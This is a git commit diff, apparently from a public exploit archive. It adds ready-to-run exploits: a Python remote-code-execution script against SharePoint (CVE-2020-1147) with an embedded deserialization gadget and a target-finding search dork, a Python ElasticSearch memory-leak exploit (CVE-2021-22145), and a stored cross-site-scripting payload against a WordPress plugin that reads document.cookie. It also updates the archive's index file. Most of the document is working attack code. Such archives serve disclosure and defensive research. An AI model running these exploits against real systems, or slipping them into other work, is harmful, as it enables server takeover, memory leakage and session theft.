DB: 2021-07-24

4 changes to exploits/shellcodes ElasticSearch 7.13.3 - Memory disclosure WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS) Microsoft SharePoint Server 2019 - Remote Code Execution (2)
2021-07-24 05:01:55 +00:00 · 2021-07-24 05:01:55 +00:00 · e9439759d7
commit e9439759d7
parent e4e9d54ac6
5 changed files with 311 additions and 8 deletions
--- a/exploits/aspx/webapps/48747.py
+++ b/exploits/aspx/webapps/48747.py
@ -244,11 +244,4 @@ result.headers['MicrosoftSharePointTeamServices'])
            stdout.write('Response: %d\n' % result.status_code)

    except Exception as error:
-        stderr.write('error in main %s' % str(error))
-
-
-Regards,
-
-West Shepherd
-OSWE | OSCE | OSCP | OSWP | CEH | Security+
-West Lee Shepherd, LLC
+        stderr.write('error in main %s' % str(error))
--- a/exploits/aspx/webapps/50151.py
+++ b/exploits/aspx/webapps/50151.py
@ -0,0 +1,221 @@
+# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
+# Google Dork: inurl:quicklinks.aspx
+# Date: 2020-08-14
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://www.microsoft.com
+# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
+# Pack 2, SharePoint Server 2019
+# Tested on: Windows 2016
+# CVE : CVE-2020-1147
+# Credit goes to Steven Seele and Soroush Dalili
+# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
+
+#!/usr/bin/python
+from sys import argv, exit, stdout, stderr
+import argparse
+import requests
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from requests_ntlm import HttpNtlmAuth
+from urllib import quote, unquote
+import logging
+
+
+class Exploit(object):
+    # To generate the gadget use:
+    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
+    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
+    gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
+    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
+    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
+    control_path = control_path_quicklinks
+
+    def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):
+        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+        self.username = '%s\\%s' % (domain, username)
+        self.target = target
+        self.password = password
+        self.session = requests.session()
+        self.redirect = redirect
+        self.timeout = 0.5
+        self.proxies = {
+            'http': 'http://%s' % proxy_address,
+            'https': 'http://%s' % proxy_address
+        } \
+            if proxy_address is not None \
+               and proxy_address != '' else {}
+        self.headers = {}
+        self.query_params = {
+            'Mode': "Suggestion"
+        }
+        self.form_values = {
+            '__viewstate': '',
+            '__SUGGESTIONSCACHE__': ''
+        }
+        self.cookies = {}
+        self.payload = """\
+<DataSet>
+  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
+xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
+    <xs:element name="somedataset" msdata:IsDataSet="true"
+msdata:UseCurrentLocale="true">
+      <xs:complexType>
+        <xs:choice minOccurs="0" maxOccurs="unbounded">
+          <xs:element name="Exp_x0020_Table">
+            <xs:complexType>
+              <xs:sequence>
+                <xs:element name="pwn"
+msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,
+System.Web, Version=4.0.0.0, Culture=neutral,
+PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,
+PresentationFramework, Version=4.0.0.0, Culture=neutral,
+PublicKeyToken=31bf3856ad364e35]], System.Data.Services,
+Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
+type="xs:anyType" minOccurs="0"/>
+              </xs:sequence>
+            </xs:complexType>
+          </xs:element>
+        </xs:choice>
+      </xs:complexType>
+    </xs:element>
+  </xs:schema>
+  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"
+xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
+    <somedataset>
+      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0"
+diffgr:hasChanges="inserted">
+        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+        <ExpandedElement/>
+        <ProjectedProperty0>
+            <MethodName>Deserialize</MethodName>
+            <MethodParameters>
+                <anyType
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xsi:type="xsd:string">{GADGET}</anyType>
+            </MethodParameters>
+            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
+        </ProjectedProperty0>
+        </pwn>
+      </Exp_x0020_Table>
+    </somedataset>
+  </diffgr:diffgram>
+</DataSet>""".replace('{GADGET}', self.gadget)
+
+    def do_get(self, url, params=None, data=None):
+        return self.session.get(
+            url=url,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            data=data,
+            params=params,
+            auth=HttpNtlmAuth(self.username, self.password)
+        )
+
+    def do_post(self, url, data=None, params=None):
+        return self.session.post(
+            url=url,
+            data=data,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            params=params,
+            auth=HttpNtlmAuth(self.username, self.password)
+        )
+
+    def parse_page(self, content):
+        soup = BeautifulSoup(content, 'lxml')
+        for key, val in self.form_values.iteritems():
+            try:
+                for tag in soup.select('input[name=%s]' % key):
+                    try:
+                        self.form_values[key] = tag['value']
+                    except Exception as error:
+                        stderr.write('error for key %s error %s\n' % (key, str(error)))
+            except Exception as error:
+                stderr.write('error for selector %s error %s\n' % (key, str(error)))
+        return self
+
+    def debug(self):
+        try:
+            import http.client as http_client
+        except ImportError:
+            import httplib as http_client
+        http_client.HTTPConnection.debuglevel = 1
+        logging.basicConfig()
+        logging.getLogger().setLevel(logging.DEBUG)
+        requests_log = logging.getLogger("requests.packages.urllib3")
+        requests_log.setLevel(logging.DEBUG)
+        requests_log.propagate = True
+        return self
+
+    def clean(self, payload):
+        payload = payload.replace('\n', '').replace('\r', '')
+        while '  ' in payload:
+            payload = payload.replace('  ', ' ')
+        return payload
+
+    def get_form(self):
+        url = '%s%s' % (self.target, self.control_path)
+        resp = self.do_get(url=url, params=self.query_params)
+        self.parse_page(content=resp.content)
+        return resp
+
+    def send_payload(self):
+        url = '%s%s' % (self.target, self.control_path)
+        # self.get_form()
+        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
+        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
+        self.form_values['__viewstate'] = ''
+        resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
+        return resp
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
+    try:
+        parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ')
+        parser.add_argument("-username", action='store', default='', help='Username to use: first.last')
+        parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local')
+        parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020')
+        parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
+        parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False')
+        parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080')
+
+        if len(argv) == 1:
+            parser.print_help()
+            exit(1)
+        options = parser.parse_args()
+
+        exp = Exploit(
+            proxy_address=options.proxy,
+            username=options.username,
+            domain=options.domain,
+            password=options.password,
+            target=options.target
+        )
+
+        if options.debug:
+            exp.debug()
+            stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
+                options.target, options.username, options.domain, options.password, options.debug, options.proxy
+            ))
+
+        result = exp.send_payload()
+        stdout.write('Response: %d\n' % result.status_code)
+        if 'MicrosoftSharePointTeamServices' in result.headers:
+            stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])
+        if options.both and result.status_code != 200:
+            exp.control_path = exp.control_path_quicklinksdialogform
+            stdout.write('Trying alternate page\n')
+            result = exp.send_payload()
+            stdout.write('Response: %d\n' % result.status_code)
+
+    except Exception as error:
+        stderr.write('error in main %s' % str(error))
--- a/exploits/multiple/webapps/50149.py
+++ b/exploits/multiple/webapps/50149.py
@ -0,0 +1,70 @@
+# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure 
+# Date: 21/07/2021
+# Exploit Author: r0ny
+# Vendor Homepage: https://www.elastic.co/
+# Software Link: https://github.com/elastic/elasticsearch
+# Version: 7.10.0 to 7.13.3
+# Tested on: Kali Linux
+# CVE : CVE-2021-22145
+
+#/usr/bin/python3
+
+from argparse import ArgumentParser
+import requests
+from packaging import version
+import json
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print("\n################################################################################################")
+print("######    CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3)    ######")
+print("######                     Exploit by r0ny (https://twitter.com/_r0ny)                    ######")
+print("################################################################################################\n")
+parser = ArgumentParser()
+parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
+parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
+parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
+args = parser.parse_args()
+
+if not (args.url):
+    parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"')
+
+#Prepare authentication header
+authorization_header = "" 
+if(args.api_key or args.basic):
+    authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic
+
+#Check elasticsearch version
+r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False)
+try:
+	es_version = json.loads(r.content)["version"]["number"]
+except:
+	print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
+	print("# Server response: " + str(r.content))
+	exit()
+
+if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
+	print("# Elastic Service not vulnerable")
+	print("# Elastic Service version: " + es_version) 
+	print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3") 	
+	exit()
+
+#Prepare exploitation	
+payload = "@\n"
+vulnerable_endpoint = "/_bulk"
+url = args.url + vulnerable_endpoint
+
+#Exploitation
+print("# ElasticSearch Version: " + es_version)
+print("# Request to " + url+"\n")
+r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False)
+
+#Read Memory Leak and remove stacktrace
+
+print("$$$$$$$$$$$$$$$$$$$$$$$$$")
+print("$$$$$ Memory Leaked $$$$$")
+print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
+response = json.loads(r.content)
+leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
+leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
+print(leak1+"\n"+leak2)
--- a/exploits/php/webapps/50150.txt
+++ b/exploits/php/webapps/50150.txt
@ -0,0 +1,16 @@
+# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
+# Date: 23/07/2021
+# Exploit Author: Vikas Srivastava
+# Software Link: https://wordpress.org/plugins/simple-post/
+# Version: 1.1
+# Category: Web Application
+# Tested on Mac
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.7.2
+2. Install and activate Simple Post
+3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field.
+4. Click Update Options.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: "><script>alert(document.cookie)</script>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44282,3 +44282,6 @@ id,file,description,date,author,type,platform,port
 50146,exploits/hardware/webapps/50146.txt,"KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass",2021-07-21,LiquidWorm,webapps,hardware,
 50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",2021-07-21,LiquidWorm,webapps,hardware,
 50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",2021-07-21,faisalfs10x,webapps,php,
+50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",2021-07-23,r0ny,webapps,multiple,
+50150,exploits/php/webapps/50150.txt,"WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)",2021-07-23,"Vikas Srivastava",webapps,php,
+50151,exploits/aspx/webapps/50151.py,"Microsoft SharePoint Server 2019 - Remote Code Execution (2)",2021-07-23,Podalirius,webapps,aspx,